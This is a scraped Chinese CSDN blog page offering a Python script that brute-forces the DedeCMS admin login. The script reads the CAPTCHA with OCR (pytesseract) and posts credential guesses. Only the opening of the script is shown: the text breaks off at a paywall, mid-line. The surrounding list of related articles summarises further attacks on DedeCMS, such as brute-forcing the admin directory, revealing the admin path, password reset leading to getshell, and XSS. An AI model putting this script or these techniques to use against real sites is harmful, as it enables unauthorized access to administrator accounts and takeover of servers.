Dedecms 后台自动识别验证码爆破脚本

最新推荐文章于 2024-04-05 09:44:31 发布
最新推荐文章于 2024-04-05 09:44:31 发布
阅读量659 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39216626/article/details/110822807
版权 
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import pytesseract
from PIL import Image
import re
 
 
class DedeCMSLogin:
    def __init__(self, userid, pwd):
        self.vdcode = ""
        self.userid = userid
        self.pwd = pwd
 
    def login_check(self, content):
        # 这里返回的情况是动态写入的,因此不可以用lxml
        pattern = re.compile("document\.write\((.*?)\)")
        result = pattern.findall(content)[2]
        return result
 
    def login(self, ssion, url):
        data = {
            "userid": self.userid,
            "pwd": self.pwd,
            "adminstyle": "newdedecms",
            "dopost": "login",
            "keeptime": "604800",
            "validate": self.vdcode,
        }
        response = ssion.post(url, data=data)
        loginResult = self.login_check(response.text)
        #print(loginResult)
        return loginRe
最低0.47元/天 解锁文章
Aohanhh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
织梦服务器系统win10,WIN服务器爆破DEDECMS后台目录
weixin_39531594的博客
08-06 519
利用脚本python:#!/usr/bin/env python'''/** author = Mochazz* team = 红日安全团队* env = pyton3**/'''import requestsimport itertoolscharacters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"back_dir = ""flag = ...
织梦DEDECMS网站后台安全检测提示 加一个开关
weixin_34128534的博客
04-02 65
1.进入后台后,点击 系统->系统基本参数->添加变量: 变量名称:cfg_safecheck_switch 变量值:N 变量类型:布尔(Y/N) 参数说明:启用安全监测系统:    2.找到系统后台目录(默认为dede)打开目录下的templets/index_body.htm文件 修改该文件18-35行修改为 <script typ...
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
qq_53058639的博客
04-05 1083
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
织梦查找后台方法总结
weixin_34101229的博客
11-08 1630
1. /data/mysql_error_trace.inc 2、/include/dialog/select_soft.php 3、/include/dialog/select_media.php?f=form1.murl 4,用些工具扫描后台,比如明小子、御剑、wwwscan等; 5,谷歌黑客搜索,关键字,例如:inurl: 6、/robots...
dedecms后台总结_dedecms系统后台查找技巧分析
weixin_42298382的博客
02-23 645
这篇文章主要为大家介绍了dedecms系统后台查找技巧分析,可通过访问的报错信息找到后台访问地址,对于dedecms建站的安全来说具有重要的参考价值,需要的朋友可以参考下本文较为详细的分析了dedecms系统后台查找技巧。分享给大家供大家参考。具体分析如下:有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址,这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法.这个时候大家可以尝试下...
dedecms后台文件技巧
cc1988429的专栏
10-12 1729
1.include/dialog/select_soft.php文件可以爆出DEDECMS后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台. 2.include/dialog/config.php会爆出后台管理路径 3.include/dialog/select_soft.php?activepath=/include/FCKeditor
DedeCMS(CVE-2019-8933)
m0_74559567的博客
03-15 583
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
[dede漏洞]dede 爆后台 路径,dede后台地址查询
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
时间:2013-03-16 23:05来源:未知 作者:admin 点击:1131次http://123.42824.com/1837.html [dede漏洞]dede 爆后台 路径,dede后台地址查询 今天偶尔看到dede可以爆后台路径,具体方法是 1.include/dialog/select_soft.php文件可以爆出DEDECMS后台,以前的老板本可以跳过登陆验证直接访问,无需管理
管理后台UI.rar_dedecms_dedecms后台新样式_dedecms和ui
09-24
dedecms 经典样式,二次开发
Dede后台验证码不显示三种解决方案
12-12
Dede后台验证码不显示三种解决方案,包括取出验证码验证
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
Dedecms存在储存型跨站脚本漏洞1
08-03
测试环境:DedeCMS-V5.7-UTF8-SP2 发布日期: 2017-03-15 官方最新版 漏洞利用条件:DedeCMS开启shop模块漏洞分析漏洞触发
dedecms一键解密工具
10-11
dedecms一键解密工具 用起来方便简单 添加地址直接一键使用 dedecms网络渗透专用
织梦后台html模板调用,Dedecms织梦后台模板采集功能的使用方法详解
weixin_29309785的博客
06-04 323
前言:这篇文章是为了初次接触Dedecms采集功能的朋友所写的。所选取的目标站点为文章内容页面不含有分页的Dedecms官方网站的dreameaver栏目文章,通过图文并茂的形式,详细地介绍了如何创建一个基本的采集规则。本文共分为三节:第一节,主要是介绍如何进入采集界面和新增采集节点中的第一步:设置基本信息及网址索引页规则;第二节,主要是介绍新增采集节点中的第二步:设置字段获取规则;第三节,主要是...
织梦DedeCms的安全问题解决办法(安全设置)
林中明月间丶
06-21 317
https://www.xiuzhanwang.com/dedecms_aq/762.html 废话不多说,下面整理一些比较常用的处理方案: 第一步: 安装织梦CMS后,记得一定要删除install 文件夹。 第二步: 后台登录一定要开启验证码功能(或自行编写个安全机制),将默认管理员admin删除,改成一个自己专用的,复杂点的账号,管理员密码一定要长,至少8位,而且字母与数字混合。 扩展阅读:修改织梦默认管理员admin教程 第三步: 将dedecms后台管理默认目录名dede改掉,随便改
【python爬虫实战】:不同验证码自动识别
Python栈
07-12 9598
你有没有想过,当你在填写登录表单时,为什么会有验证码?为什么它们有时候那么复杂,让人头大?而有时候又显得那么弱智?今天,我们一起探讨一下如何用 Python 爬虫识别各种验证码,让你的爬虫项目自由冲浪!
取消php网站验证码,织梦DEDECMS怎么取消后台验证码
05-19
1. 进入DEDECMS后台,找到“系统设置”->“安全设置”->“登陆安全设置”。 2. 将“后台验证码”选项设置为“关闭”。 3. 点击“保存”按钮,保存设置即可。 请注意,取消后台验证码可能会使您的网站更容易受到恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值